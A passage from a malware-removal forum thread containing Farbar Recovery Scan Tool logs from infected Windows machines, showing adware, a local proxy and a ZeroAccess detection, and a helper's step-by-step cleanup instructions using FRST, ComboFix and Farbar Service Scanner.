    SSODL-x32: EldosMountNotificator - {C28617FD-4FE7-4043-AD51-C8132CE90106} - C:\Windows\SysWOW64\SSCbFsMntNtf3.dll (EldoS Corporation)

    ==================== Internet (Whitelisted) ====================

    ProxyServer: http=127.0.0.1:58687
    HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=U040&ocid=U040DHP&dt=080813
    HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_US&c=94&bd=Pavilion&pf=cndt
    HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Restore = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_US&c=94&bd=Pavilion&pf=cndt
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_US&c=94&bd=Pavilion&pf=cndt
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_US&c=94&bd=Pavilion&pf=cndt
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_US&c=94&bd=Pavilion&pf=cndt
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=en_US&c=94&bd=Pavilion&pf=cndt
    StartMenuInternet: IEXPLORE.EXE - %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
    SearchScopes: HKLM - DefaultScope {3402CC29-EC9D-4FF3-8647-077679973A5B} URL = http://www.bing.com/search?q={searchTerms}&FORM=HPDTDF&pc=HPDTDF&src=IE-SearchBox
    SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKLM - {74AE090C-745B-4BDF-96A5-2C7F29055522} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
    SearchScopes: HKLM-x32 - DefaultScope {3402CC29-EC9D-4FF3-8647-077679973A5B} URL = http://www.bing.com/search?q={searchTerms}&FORM=HPDTDF&pc=HPDTDF&src=IE-SearchBox
    SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKLM-x32 - {74AE090C-745B-4BDF-96A5-2C7F29055522} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
    SearchScopes: HKCU - DefaultScope {40419C19-01BD-D42C-3B25-A639D6F21B1C} URL = http://www.bing.com/search?q={searchTerms}&pc=Z016&form=ZGAIDF
    SearchScopes: HKCU - {40419C19-01BD-D42C-3B25-A639D6F21B1C} URL = http://www.bing.com/search?q={searchTerms}&pc=Z016&form=ZGAIDF
    SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
    SearchScopes: HKCU - {74AE090C-745B-4BDF-96A5-2C7F29055522} URL = http://www.ask.com/web?q={searchterms}&l=dis&o=ushpd
    BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
    BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
    BHO-x32: Adobe PDF Link Helper - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
    BHO-x32: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
    BHO-x32: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\microsoft shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
    BHO-x32: No Name - {9D425283-D487-4337-BAB6-AB8354A81457} - No File
    BHO-x32: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
    BHO-x32: Microsoft Live Search Toolbar Helper - {d2ce3e00-f94a-4740-988e-03dc2f38c34f} - C:\Program Files (x86)\MSN\Toolbar\3.0.0560.0\msneshellx.dll (Microsoft Corp.)
    BHO-x32: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
    Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
    Toolbar: HKLM-x32 - Microsoft Live Search Toolbar - {1E61ED7C-7CB8-49d6-B9E9-AB4C880C8414} - C:\Program Files (x86)\MSN\Toolbar\3.0.0560.0\msneshellx.dll (Microsoft Corp.)
    Toolbar: HKLM-x32 - No Name - {9D425283-D487-4337-BAB6-AB8354A81457} - No File
    Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
    Toolbar: HKCU - No Name - {604BC32A-9680-40D1-9AC6-E06B23A1BA4C} - No File
    Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
    DPF: HKLM {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
    DPF: HKLM-x32 {4871A87A-BFDD-4106-8153-FFDE2BAC2967} http://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.5.7.cab
    DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
    Winsock: Catalog5 01 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
    Winsock: Catalog5 02 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
    Winsock: Catalog5-x64 01 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
    Winsock: Catalog5-x64 02 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll"
    Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt

    FireFox:
    ========
    FF ProfilePath: C:\Users\Fabian Zayas\AppData\Roaming\Mozilla\Firefox\Profiles\jvo0hogw.default
    FF NetworkProxy: "http", "127.0.0.1"
    FF NetworkProxy: "http_port", 58687
    FF NetworkProxy: "type", 1
    FF DefaultSearchEngine: Bing
    FF SelectedSearchEngine: Bing
    FF SearchEngineOrder.3: Bing
    FF Keyword.URL: hxxp://www.bing.com/search?FORM=U040DF&PC=U040&dt=080813&q=
    FF Homepage: hxxp://www.msn.com/?pc=U040&ocid=U040DHP&dt=080813
    FF Plugin: @adobe.com/FlashPlayer - C:\Windows\system32\Macromed\Flash\NPSWF64_11_7_700_224.dll ()
    FF Plugin: @microsoft.com/GENUINE - disabled No File
    FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
    FF Plugin-x32: @adobe.com/FlashPlayer - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_7_700_224.dll ()
    FF Plugin-x32: @java.com/DTPlugin,version=10.9.2 - C:\Windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
    FF Plugin-x32: @java.com/JavaPlugin,version=10.9.2 - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
    FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
    FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.21.165\npGoogleUpdate3.dll (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.21.165\npGoogleUpdate3.dll (Google Inc.)
    FF Plugin HKCU: @facebook.com/FBPlugin,version=1.0.3 - C:\Users\Fabian Zayas\AppData\Roaming\Facebook\npfbplugin_1_0_3.dll No File
    FF Plugin HKCU: @tools.google.com/Google Update;version=3 - C:\Users\Fabian Zayas\AppData\Local\Google\Update\1.3.21.165\npGoogleUpdate3.dll (Google Inc.)
    FF Plugin HKCU: @tools.google.com/Google Update;version=9 - C:\Users\Fabian Zayas\AppData\Local\Google\Update\1.3.21.165\npGoogleUpdate3.dll (Google Inc.)
    FF SearchPlugin: C:\Users\Fabian Zayas\AppData\Roaming\Mozilla\Firefox\Profiles\jvo0hogw.default\searchplugins\bingp.xml
    FF Extension: I Want This - C:\Users\Fabian Zayas\AppData\Roaming\Mozilla\Firefox\Profiles\jvo0hogw.default\Extensions\crossriderapp2258@crossrider.com
    FF HKLM-x32\...\Firefox\Extensions: [{7BA52691-1876-45ce-9EE6-54BCB3B04BBC}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\Norton\coFFPlgn\

    Chrome:
    =======
    CHR HomePage: hxxp://www.google.com/
    CHR RestoreOnStartup: "hxxp://www.google.com/"
    CHR Plugin: (Remoting Viewer) - internal-remoting-viewer
    CHR Plugin: (Native Client) - C:\Users\Fabian Zayas\AppData\Local\Google\Chrome\Application\30.0.1599.101\ppGoogleNaClPluginChrome.dll ()
    CHR Plugin: (Chrome PDF Viewer) - C:\Users\Fabian Zayas\AppData\Local\Google\Chrome\Application\30.0.1599.101\pdf.dll ()
    CHR Plugin: (Shockwave Flash) - C:\Users\Fabian Zayas\AppData\Local\Google\Chrome\Application\30.0.1599.101\gcswf32.dll No File
    CHR Plugin: (Shockwave Flash) - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32.dll No File
    CHR Plugin: (Download Manager) - C:\Users\Fabian Zayas\AppData\Local\Google\Chrome\User Data\Default\Extensions\cbngmhdomibdionpoibpjdkloeggblgi\1.0_0\npDownloadManager.dll No File
    CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
    CHR Plugin: (Java Deployment Toolkit 6.0.260.3) - C:\Program Files (x86)\Java\jre6\bin\new_plugin\npdeployJava1.dll (Sun Microsystems, Inc.)
    CHR Plugin: (Java(TM) Platform SE 6 U26) - C:\Program Files (x86)\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
    CHR Plugin: (QuickTime Plug-in 7.6.5) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin.dll (Apple Inc.)
    CHR Plugin: (QuickTime Plug-in 7.6.5) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin2.dll (Apple Inc.)
    CHR Plugin: (QuickTime Plug-in 7.6.5) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin3.dll (Apple Inc.)
    CHR Plugin: (QuickTime Plug-in 7.6.5) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin4.dll (Apple Inc.)
    CHR Plugin: (QuickTime Plug-in 7.6.5) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin5.dll (Apple Inc.)
    CHR Plugin: (QuickTime Plug-in 7.6.5) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin6.dll (Apple Inc.)
    CHR Plugin: (QuickTime Plug-in 7.6.5) - C:\Program Files (x86)\QuickTime\plugins\npqtplugin7.dll (Apple Inc.)
    CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.111\npGoogleUpdate3.dll No File
    CHR Plugin: (Windows Live\u0099 Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
    CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll No File
    CHR Plugin: (BrowserPlus (from Yahoo!) v2.9.8) - C:\Users\Fabian Zayas\AppData\Local\Yahoo!\BrowserPlus\2.9.8\Plugins\npybrowserplus_2.9.8.dll No File
    CHR Plugin: (Facebook Plugin) - C:\Users\Fabian Zayas\AppData\Roaming\Facebook\npfbplugin_1_0_3.dll No File
    CHR Plugin: (Silverlight Plug-In) - c:\Program Files (x86)\Microsoft Silverlight\5.1.10411.0\npctrl.dll No File
    CHR Extension: (Google Drive) - C:\Users\FABIAN~1\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0
    CHR Extension: (YouTube) - C:\Users\FABIAN~1\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0
    CHR Extension: (Adblock Plus) - C:\Users\FABIAN~1\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb\1.6.1_0
    CHR Extension: (Google Search) - C:\Users\FABIAN~1\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0
    CHR Extension: (Sketchpad) - C:\Users\FABIAN~1\AppData\Local\Google\Chrome\User Data\Default\Extensions\lkllajgbhondgjjnhmmgbjndmogapinp\1.0.0.4_0
    CHR Extension: () - C:\Users\FABIAN~1\AppData\Local\Google\Chrome\User Data\Default\Extensions\llaficoajjainaijghjlofdfmbjpebpa\4.3.3_0
    CHR Extension: (Chrome In-App Payments service) - C:\Users\FABIAN~1\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.4.11_1
    CHR Extension: (WeVideo - Video Editor and Maker) - C:\Users\FABIAN~1\AppData\Local\Google\Chrome\User Data\Default\Extensions\okgjbfikepgflmlelgfgecmgjnmnmnnb\3.3.3_0
    CHR Extension: (OneClick Cleaner for Chrome) - C:\Users\FABIAN~1\AppData\Local\Google\Chrome\User Data\Default\Extensions\oncckmaelaecccmaniihojgeopkcajfh\0.9.0.7_0
    CHR Extension: (Gmail) - C:\Users\FABIAN~1\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1
    CHR Extension: (RSS Feed Reader) - C:\Users\FABIAN~1\AppData\Local\Google\Chrome\User Data\Default\Extensions\pnjaodmkngahhkoihejjehlcdlnohgmp\5.2.0_0
    CHR HKLM-x32\...\Chrome\Extension: [mpfapcdfbbledbojijcbcclmlieaoogk] - C:\Users\Fabian Zayas\AppData\Local\I Want This\Chrome\I Want This.crx

    ==================== Services (Whitelisted) =================

    R2 DigiRefresh; C:\Program Files (x86)\Digidesign\Drivers\MMERefresh.exe [77824 2009-08-14] (Digidesign, A Division of Avid Technology, Inc.)
    S3 digiSPTIService; C:\Program Files (x86)\Digidesign\Pro Tools\digiSPTIService.exe [159744 2009-08-14] (Digidesign, A Division of Avid Technology, Inc.)
    R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe [398184 2012-12-14] (Malwarebytes Corporation)
    R2 MBAMService; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [682344 2012-12-14] (Malwarebytes Corporation)
    R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23808 2013-08-12] (Microsoft Corporation)
    R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [366600 2013-08-12] (Microsoft Corporation)
    R2 USBMIDIAudioDevMon; C:\Program Files (x86)\M-Audio\USB MIDI Series\AudioDevMon.exe [1636872 2010-04-13] (M-Audio)
    R2 WSWNA3100; C:\Program Files (x86)\NETGEAR\WNA3100\WifiSvc.exe [303360 2011-12-07] ()

    ==================== Drivers (Whitelisted) ====================

    R3 gbridge; C:\Windows\System32\DRIVERS\gbridge64.sys [48192 2009-10-13] (Gbridge LLC)
    S3 KORGUMDS; C:\Windows\System32\Drivers\KORGUM64.SYS [31832 2010-01-08] (KORG INC.)
    S3 MAUSBMIDI; C:\Windows\System32\DRIVERS\MAudioUSBMIDI.sys [200200 2010-04-13] (M-Audio)
    R3 MBAMProtector; C:\Windows\system32\drivers\Malwarebytes Anti-Malware.sys [24176 2012-12-14] (Malwarebytes Corporation)
    S3 MBX2DFU; C:\Windows\System32\DRIVERS\MBX2DFU.sys [31120 2009-08-15] (Digidesign, A Division of Avid Technology, Inc.)
    S3 MBX2MIDK; C:\Windows\System32\drivers\mbx2midk.sys [32400 2009-08-15] (Digidesign, A Division of Avid Technology, Inc.)
    R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [247216 2013-06-18] (Microsoft Corporation)
    R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [139616 2013-06-18] (Microsoft Corporation)
    S3 NPF; C:\Windows\System32\DRIVERS\npf.sys [47632 2010-02-03] (CACE Technologies, Inc.)
    R3 SSCBFS3; C:\Windows\System32\DRIVERS\sscbfs3.sys [347904 2013-01-30] (EldoS Corporation)
    U4 eqcpqxgh;
    U4 PCDSRVC{F36B3A4C-F95654BD-06000000}_0;
    U4 rgqxleuo;

    ==================== NetSvcs (Whitelisted) ===================


    ==================== One Month Created Files and Folders ========

    2013-12-02 04:02 - 2013-12-02 04:02 - 00296704 _____ C:\Windows\Minidump\120213-20888-01.dmp
    2013-11-21 04:07 - 2013-11-21 04:07 - 00000000 ____D C:\FRST
    2013-11-19 23:00 - 2013-11-19 23:00 - 00445859 _____ C:\Users\Fabian Zayas\Downloads\Unconfirmed 89245.crdownload
    2013-11-19 23:00 - 2013-11-19 23:00 - 00000920 _____ C:\Users\Fabian Zayas\Desktop\Rkill.txt
    2013-11-19 22:58 - 2013-11-19 22:58 - 00000000 ____D C:\TDSSKiller_Quarantine
    2013-11-19 22:41 - 2013-11-19 22:41 - 00000000 ____D C:\Windows\system32\MpEngineStore
    2013-11-08 09:51 - 2013-11-08 09:51 - 00292576 _____ C:\Windows\Minidump\110813-25662-01.dmp

    ==================== One Month Modified Files and Folders =======

    2013-12-02 04:58 - 2012-02-03 10:03 - 00000936 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1262836980-3029127208-1620874908-1000UA.job
    2013-12-02 04:52 - 2013-03-07 01:38 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
    2013-12-02 04:44 - 2009-07-13 23:45 - 00015792 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
    2013-12-02 04:44 - 2009-07-13 23:45 - 00015792 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
    2013-12-02 04:41 - 2011-02-15 22:09 - 00000910 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
    2013-12-02 04:37 - 2009-10-31 04:17 - 01425841 _____ C:\Windows\WindowsUpdate.log
    2013-12-02 04:28 - 2013-04-01 03:54 - 00000000 ____D C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
    2013-12-02 04:25 - 2011-11-06 06:34 - 00000000 ___HD C:\ProgramData\NCH Software
    2013-12-02 04:25 - 2011-11-06 06:34 - 00000000 ____D C:\Program Files (x86)\NCH Software
    2013-12-02 04:22 - 2013-04-01 03:47 - 00000000 ____D C:\Program Files (x86)\Bonjour
    2013-12-02 04:22 - 2011-09-02 19:54 - 00000000 ____D C:\Users\Fabian Zayas\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line
    2013-12-02 04:22 - 2011-09-02 19:52 - 00000000 ____D C:\Program Files (x86)\Image-Line
    2013-12-02 04:14 - 2009-07-14 00:13 - 00726444 _____ C:\Windows\system32\PerfStringBackup.INI
    2013-12-02 04:08 - 2011-02-15 22:09 - 00000906 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
    2013-12-02 04:07 - 2009-07-14 00:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
    2013-12-02 04:07 - 2009-07-13 23:51 - 00191993 _____ C:\Windows\setupact.log
    2013-12-02 04:02 - 2013-12-02 04:02 - 00296704 _____ C:\Windows\Minidump\120213-20888-01.dmp
    2013-12-02 04:02 - 2010-01-29 10:38 - 759066500 _____ C:\Windows\MEMORY.DMP
    2013-12-02 04:02 - 2010-01-29 10:38 - 00000000 ____D C:\Windows\Minidump
    2013-12-01 22:08 - 2010-01-20 00:39 - 00000000 ____D C:\Users\Fabian Zayas
    2013-11-21 04:07 - 2013-11-21 04:07 - 00000000 ____D C:\FRST
    2013-11-21 03:13 - 2009-07-13 22:20 - 00000000 ____D C:\Windows\registration
    2013-11-19 23:00 - 2013-11-19 23:00 - 00445859 _____ C:\Users\Fabian Zayas\Downloads\Unconfirmed 89245.crdownload
    2013-11-19 23:00 - 2013-11-19 23:00 - 00000920 _____ C:\Users\Fabian Zayas\Desktop\Rkill.txt
    2013-11-19 22:58 - 2013-11-19 22:58 - 00000000 ____D C:\TDSSKiller_Quarantine
    2013-11-19 22:41 - 2013-11-19 22:41 - 00000000 ____D C:\Windows\system32\MpEngineStore
    2013-11-17 23:58 - 2012-02-03 10:03 - 00000884 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1262836980-3029127208-1620874908-1000Core.job
    2013-11-08 09:51 - 2013-11-08 09:51 - 00292576 _____ C:\Windows\Minidump\110813-25662-01.dmp
    2013-11-02 02:01 - 2013-04-30 14:44 - 00001945 _____ C:\Windows\epplauncher.mif
    2013-11-02 02:01 - 2013-04-30 14:42 - 00000000 ____D C:\Program Files (x86)\Microsoft Security Client
    2013-11-02 02:01 - 2013-04-30 14:41 - 00000000 ____D C:\Program Files\Microsoft Security Client

    Some content of TEMP:
    ====================
    C:\Users\Fabian Zayas\AppData\Local\Temp\uninst.exe


    ==================== Bamital & volsnap Check =================

    C:\Windows\System32\winlogon.exe => MD5 is legit
    C:\Windows\System32\wininit.exe => MD5 is legit
    C:\Windows\SysWOW64\wininit.exe => MD5 is legit
    C:\Windows\explorer.exe => MD5 is legit
    C:\Windows\SysWOW64\explorer.exe => MD5 is legit
    C:\Windows\System32\svchost.exe => MD5 is legit
    C:\Windows\SysWOW64\svchost.exe => MD5 is legit
    C:\Windows\System32\services.exe => MD5 is legit
    C:\Windows\System32\User32.dll => MD5 is legit
    C:\Windows\SysWOW64\User32.dll => MD5 is legit
    C:\Windows\System32\userinit.exe => MD5 is legit
    C:\Windows\SysWOW64\userinit.exe => MD5 is legit
    C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit
    ATTENTION: ====> ZeroAccess. Use DeleteJunctionsIndirectory: C:\Windows\system64


    LastRegBack: 2013-11-10 00:03

    ==================== End Of Log ============================
     
  16. TwinHeadedEagle

    TwinHeadedEagle Removal Expert
    Staff Member

    Mar 8, 2013
    21,434
    2,634
    Malware Removal, Gaming
    Windows 7
    ESET
    Download attached fixlist.txt on the same location as FRST (otherwise the fix won't work)

    Open FRST, and click Fix. Attach me that report after it is finished.



    1. Please download ComboFix by sUBs from here and save it to your Desktop.
    If you are unsure how ComboFix works please read this guide carefully.
    Note: ComboFix must be downloaded to your Desktop.

    --------------------------------------------------------------------
    2. Temporarily disable your AntiVirus program.
    If you are unsure how to do this please read this or this Instruction.

    Instructions how to disable avast:
    • Right-click on the avast! icon in the lower right corner of the screen and choose Open Avast! User Interface.
    • In the window that opens on the top right corner, click Settings.
    • In a new window that opens, choose the option Troubleshooting, Uncheck Enable avast! self-defense, and click OK.
    • => Again, right-click on the avast! icon in the lower right corner of the screen and select avast! shield controls .
    • In the menu that appears, choose Disable Permanently. When you are prompted to turn off security, click Yes.

    Note: Do not forget to turn on this option after the cleaning.

    --------------------------------------------------------------------
    3. Run ComboFix. Click on I Agree!

    ComboFix will check if there is a newer version of ComboFix available.
    Click Yes if prompted to download.

    ComboFix will display DISCLAIMER OF WARRANTY ON SOFTWARE.
    Click Yes to allow ComboFix to continue.

    If Recovery Console is not installed, ComboFix will offer download & installation.
    Click Yes to allow ComboFix to install Recovery Console.
    Note:Do not mouse-click Combofix's window while it is running.
    If you see a message like "Illegal operation attempted on a registry key that has been marked for deletion" just restart computer once more.


    --------------------------------------------------------------------
    4. When the tool is finished, it will produce a log report for you. (typical location: C:\ComboFix.txt )
    Attach log reports ( ComboFix.txt) back to topic.



    Please download Farbar Service Scanner and run it on the computer with the issue.
    • Make sure the following options are checked:
      • Internet Services
      • Windows Firewall
      • System Restore
      • Security Center/Action Center
      • Windows Update
      • Windows Defender
    • Press "Scan".
    • It will create a log (FSS.txt) in the same directory the tool is run.
    • Please copy and paste the log to your reply.
     

    Attached Files:

  17. Nigel79

    Nigel79 New Member

    Jan 4, 2015
    1
    0
    Wondering if this thread is closed; last action over a year ago. I'm experiencing enormous trouble with what looks like a corrupted iexplore.exe file; ran FRST but don't know where to go from here. It looks like I need a fixlist.txt file, which obviously I have no clue :(
    Any help would be highly appreciated
    2 reports; 1) FRST report, 2) Addition.txt report:
    /////////////////////////////////////////////// (1) FRST
    Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 03-01-2015 03
    Ran by NorMac (administrator) on LEVIATHON on 04-01-2015 09:03:29
    Running from C:\Users\NorMac\Downloads
    Loaded Profile: NorMac (Available profiles: NorMac)
    Platform: Windows 8 Pro (X64) OS Language: English (United States)
    Internet Explorer Version 10 (Default browser: FF)
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (Stardock Software, Inc) C:\Program Files (x86)\Stardock\Start8\Start8Srv.exe
    (Stardock Software, Inc) C:\Program Files (x86)\Stardock\Start8\Start8_64.exe
    (AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
    (Microsoft Corporation) C:\Windows\System32\rundll32.exe
    (SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE
    (Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
    (Microsoft Corporation) C:\Windows\System32\dasHost.exe
    (NETGEAR) C:\Program Files (x86)\NETGEAR Genie\bin\NETGEARGenieDaemon64.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
    (Intuit) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe
    () C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
    (WDC) C:\Program Files\Western Digital\WD SmartWare\WD Drive Manager\WDDMService.exe
    (Western Digital) C:\Program Files (x86)\Western Digital\WD Drive Manager\WDDriveService.exe
    () C:\Program Files (x86)\Western Digital\WD SmartWare\Front Parlor\WDFME\WDFME.exe
    (Western Digital ) C:\Program Files (x86)\Western Digital\WD SmartWare\WDRulesEngine.exe
    () C:\Program Files (x86)\Western Digital\WD SmartWare\Front Parlor\WDSC.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
    (SUPERAntiSpyware) C:\Program Files\SUPERAntiSpyware\SUPERANTISPYWARE.EXE
    (NETGEAR Inc.) C:\Program Files (x86)\NETGEAR Genie\bin\NETGEARGenie.exe
    (Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
    (McAfee, Inc.) C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe
    (Microsoft Corporation) C:\Windows\System32\dllhost.exe
    (Microsoft Corporation) C:\Windows\System32\rundll32.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
    (AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
    () C:\Program Files (x86)\NETGEAR Genie\bin\genie2_tray.exe
    (Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service\IntuitUpdateService.exe
    (Microsoft Corporation) C:\Windows\splwow64.exe
    (Nero AG) C:\Program Files (x86)\Nero\Update\NASvc.exe
    (Microsoft Corporation.) C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\SeaPort.EXE
    (Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
    (Hewlett-Packard Co.) C:\Program Files\HP\HP Officejet Pro 8600\Bin\HPNetworkCommunicatorCom.exe
